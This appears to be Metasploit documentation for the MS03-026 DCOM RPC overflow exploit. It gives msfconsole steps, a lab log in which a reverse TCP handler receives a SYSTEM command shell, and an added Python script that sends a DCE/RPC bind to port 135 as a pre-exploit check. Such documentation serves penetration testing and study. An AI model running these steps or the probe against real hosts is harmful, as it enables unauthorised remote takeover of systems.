## Vulnerable Application

This module exploits a stack buffer overflow in the RPCSS service, the DCOM RPC
interface Windows exposes on TCP port 135 (the flaw Microsoft patched in bulletin
MS03-026). The vulnerability was originally found by the Last Stage of Delirium
research group and has been widely exploited ever since. The module can exploit
the English versions of Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and
Windows 2003 with a single "universal" request that covers all of them.

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/windows/dcerpc/ms03_026_dcom`
1. Do: `set rhosts <rhosts>`
1. Do: `run`
1. You should get a `SYSTEM` shell (RPCSS runs as LocalSystem, so the shell inherits that privilege).

## Options
## Scenarios

### Windows 2000 Server SP4 (English)

```
msf6 exploit(windows/dcerpc/ms03_026_dcom) > run

[*] Started reverse TCP handler on 172.16.191.192:4444
[*] 172.16.191.164:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 172.16.191.164:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.191.164[135] ...
[*] 172.16.191.164:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.191.164
[*] Command shell session 1 opened (172.16.191.192:4444 -> 172.16.191.164:1027 ) at 2021-11-27 23:52:35 -0500


Shell Banner:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
-----


C:\WINNT\system32>
```
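The `Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:...[135]` line in the output above is the first thing the module does, and it is also the cheapest pre-check for the verification steps: a host that will not accept a DCE/RPC context for that interface (ISystemActivator) on TCP 135 never reaches the overflow. The following is an added example written for this page, not code from the module or from Metasploit. It builds the 72-byte DCE/RPC bind PDU for that interface, parses the server's `bind_ack` or `bind_nak`, and exercises the parser on a constructed reply. The `probe()` helper, `sample_bind_ack()` and the reply bytes are this example's own inventions; the interface UUID, transfer syntax and PDU layout are the standard DCE 1.1 / MS-RPCE values.

```python
"""Build and check the DCE/RPC bind to ISystemActivator on TCP 135.

Added example; not the module's code or Metasploit's. Reproduces the
"Binding to 4d9f4ab8-...:0.0@ncacn_ip_tcp:<host>[135]" step from the
scenario output so the RPCSS endpoint can be confirmed before the overflow
is sent. PDU layout follows the DCE 1.1 connection-oriented RPC protocol;
the reply bytes produced by sample_bind_ack() are constructed, not captured.
"""
import socket
import struct
import uuid

# Interface the scenario binds to (ISystemActivator, version 0.0) and the
# NDR transfer syntax every Windows RPC listener accepts.
ISYSTEM_ACTIVATOR = uuid.UUID("4d9f4ab8-7d1c-11cf-861e-0020af6e7c57")
NDR32 = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")

PTYPE_BIND, PTYPE_BIND_ACK, PTYPE_BIND_NAK = 11, 12, 13
HDR = "<BBBB4sHHI"  # vers, vers_minor, ptype, pfc_flags, drep, frag_len, auth_len, call_id
RESULT_NAMES = {0: "acceptance", 1: "user_rejection",
                2: "provider_rejection", 3: "negotiate_ack"}


def _syntax(iface: uuid.UUID, major: int, minor: int) -> bytes:
    # p_syntax_id_t: UUID in DCE mixed-endian byte order plus a u32 version
    # (major in the low 16 bits, minor in the high 16 bits).
    return iface.bytes_le + struct.pack("<HH", major, minor)


def build_bind(call_id: int = 1) -> bytes:
    """Return a 72-byte bind PDU offering one context: ISystemActivator over NDR32."""
    body = struct.pack("<HHI", 5840, 5840, 0)      # max_xmit_frag, max_recv_frag, assoc_group_id
    body += struct.pack("<BBH", 1, 0, 0)           # one context element + reserved
    body += struct.pack("<HBB", 0, 1, 0)           # context id 0, one transfer syntax
    body += _syntax(ISYSTEM_ACTIVATOR, 0, 0) + _syntax(NDR32, 2, 0)
    header = struct.pack(HDR, 5, 0, PTYPE_BIND, 0x03,   # RPC 5.0, bind, PFC_FIRST|PFC_LAST
                         b"\x10\x00\x00\x00",           # little-endian, ASCII, IEEE float
                         16 + len(body), 0, call_id)    # frag_length, auth_length 0
    return header + body


def parse_bind_response(pdu: bytes) -> dict:
    """Classify the server's answer to the bind (bind_ack or bind_nak)."""
    if len(pdu) < 16:
        raise ValueError("short PDU")
    vers, _, ptype, _, _, frag_len, _, call_id = struct.unpack_from(HDR, pdu, 0)
    if vers != 5 or frag_len > len(pdu):
        raise ValueError("not a complete RPC v5 PDU")
    info = {"ptype": ptype, "call_id": call_id}
    if ptype == PTYPE_BIND_NAK:
        reason, = struct.unpack_from("<H", pdu, 16)   # provider_reject_reason
        info.update(accepted=False, reject_reason=reason)
        return info
    if ptype != PTYPE_BIND_ACK:
        raise ValueError(f"unexpected ptype {ptype}")
    max_xmit, max_recv, assoc_group, addr_len = struct.unpack_from("<HHIH", pdu, 16)
    sec_addr = pdu[26:26 + addr_len].rstrip(b"\x00").decode("ascii", "replace")
    off = 26 + addr_len
    off += (-off) % 4                               # p_result_list is 4-byte aligned
    n_results = pdu[off]
    off += 4                                        # n_results + reserved + reserved2
    results = []
    for _ in range(n_results):
        result, reason = struct.unpack_from("<HH", pdu, off)
        syntax = uuid.UUID(bytes_le=pdu[off + 4:off + 20])
        results.append({"result": RESULT_NAMES.get(result, result),
                        "reason": reason, "transfer_syntax": str(syntax)})
        off += 24
    info.update(accepted=bool(results) and results[0]["result"] == "acceptance",
                max_xmit=max_xmit, max_recv=max_recv, assoc_group=assoc_group,
                sec_addr=sec_addr, results=results)
    return info


def sample_bind_ack(result: int = 0, reason: int = 0) -> bytes:
    """Constructed (not captured) bind_ack in the shape RPCSS returns on port 135."""
    body = struct.pack("<HHI", 5840, 5840, 0x1234)
    addr = b"135\x00"                               # secondary address = the listening port
    body += struct.pack("<H", len(addr)) + addr
    body += b"\x00" * ((-(16 + len(body))) % 4)     # pad result list to 4 bytes
    body += struct.pack("<BBH", 1, 0, 0)
    body += struct.pack("<HH", result, reason) + _syntax(NDR32, 2, 0)
    return struct.pack(HDR, 5, 0, PTYPE_BIND_ACK, 0x03, b"\x10\x00\x00\x00",
                       16 + len(body), 0, 1) + body


def probe(host: str, port: int = 135, timeout: float = 5.0) -> dict:
    """Send the bind to a live host and classify the reply (network; not used by the sample)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_bind())
        data = b""
        while len(data) < 16 or len(data) < struct.unpack_from("<H", data, 8)[0]:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return parse_bind_response(data)


if __name__ == "__main__":
    print(build_bind().hex())
    print(parse_bind_response(sample_bind_ack()))
```

Against a lab host, `probe("172.16.191.164")` returns `accepted=True` with `sec_addr="135"` when the listener takes the ISystemActivator context, which is what the module's `Binding to ...` line reports before it sends the oversized DCOM request. A `bind_nak`, or a `bind_ack` whose first result is `provider_rejection`, means the context was refused and the exploit request would not be dispatched to the vulnerable code. The bind itself carries no payload, so it is safe to run as a reachability check before touching the target with the module.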